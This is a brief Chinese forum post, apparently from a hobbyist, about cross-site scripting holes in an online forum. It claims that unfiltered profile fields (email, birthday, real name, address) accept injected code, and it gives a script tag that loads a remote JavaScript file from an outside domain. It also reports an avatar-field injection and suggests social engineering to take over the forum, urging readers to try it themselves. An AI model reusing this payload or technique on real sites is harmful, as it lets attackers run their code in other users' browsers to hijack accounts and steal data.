用户资料页  电子邮件 生日  真实姓名  联系住址 处均没做过滤  可以在 用户资料修改处写入代码
<script src='//tkbbs.com/fxcs/by1.js'></script>

一论坛 头像处 MS有跨站地方 测试 返回修改页面 代码被执行了 跑去看帖子那里 居然被过滤了 郁闷啊
MS 起不了什么危险作用。。  试N遍了 头大了 闪。。。

利用点社会工程学 还是可以搞定论坛的。。自己尝试吧

另 不知道 是不是那论坛太安全了 发贴那居然可以用HTML语法。。。 疯了  当然 我是说我自己